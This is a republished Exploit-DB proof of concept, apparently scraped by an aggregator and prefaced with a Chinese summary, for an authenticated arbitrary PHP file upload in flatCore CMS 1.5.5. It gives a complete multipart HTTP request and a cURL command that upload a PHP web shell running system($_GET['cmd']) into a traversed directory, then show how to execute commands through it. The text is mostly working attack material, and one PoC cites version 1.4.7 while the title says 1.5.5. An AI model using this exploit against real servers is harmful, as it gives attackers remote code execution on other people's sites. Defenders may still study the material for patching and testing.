[webapps] flatCore 1.5.5 - Arbitrary File Upload
该漏洞允许攻击者通过flatCore CMS的管理面板上传任意PHP文件,并在服务器上执行恶意代码。攻击者需登录管理员账户并利用CSRF令牌绕过限制,在特定目录中上传后门文件以实现远程代码执行。 2025-4-10 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:8 收藏
该漏洞允许攻击者通过flatCore CMS的管理面板上传任意PHP文件,并在服务器上执行恶意代码。攻击者需登录管理员账户并利用CSRF令牌绕过限制,在特定目录中上传后门文件以实现远程代码执行。 2025-4-10 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:8 收藏
# Exploit Title: [flatCore Arbitrary .php File Upload via acp/acp.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/flatCore/flatCore-CMS]
# Software Link: [https://github.com/flatCore/flatCore-CMS]
# Version: [1.5.5]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2019-10652]
PoC:
1)
1. Access the flatCore Admin Panel
URL: http://flatcore/acp/acp.php
Log in with valid administrative credentials.
2. Upload a Malicious PHP File
Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
3. Intercept and Modify the Upload Request
Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:
POST /acp/core/files.upload-script.php HTTP/1.1
Host: flatcore
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: <calculated length>
Cookie: PHPSESSID=<valid_session_id>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/octet-stream
<?php
// Simple PHP backdoor code
echo "Vulnerable File Upload - PoC";
system($_GET['cmd']);
?>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="upload_destination"
../content/files
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="csrf_token"
<valid_csrf_token>
-----------------------------735323031399963166993862150
Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
4. Verification
After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami
PoC
2)
# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
# Target URL: http://flatcore/
# The attacker must be authenticated as an administrator to exploit this vulnerability
# Step 1: Log in as an administrator and obtain the CSRF token
# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.
# Step 2: Upload a malicious PHP file using the file upload feature
# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
echo "<?php phpinfo(); ?>" > shell.php
# Upload the PHP file using cURL
curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
-H "Content-Type: multipart/form-data" \
-F "[email protected]" \
-F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
-F "upload_destination=../content/files" \
-F "file_mode=overwrite" \
-b "PHPSESSID=YOUR_SESSION_ID_HERE"
# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID
# Step 3: Access the uploaded malicious PHP file
echo "Visit the following URL to execute the uploaded PHP file:"
echo "http://flatcore/content/files/shell.php"
This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
[Replace Your Domain Name]
文章来源: https://www.exploit-db.com/exploits/52165
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh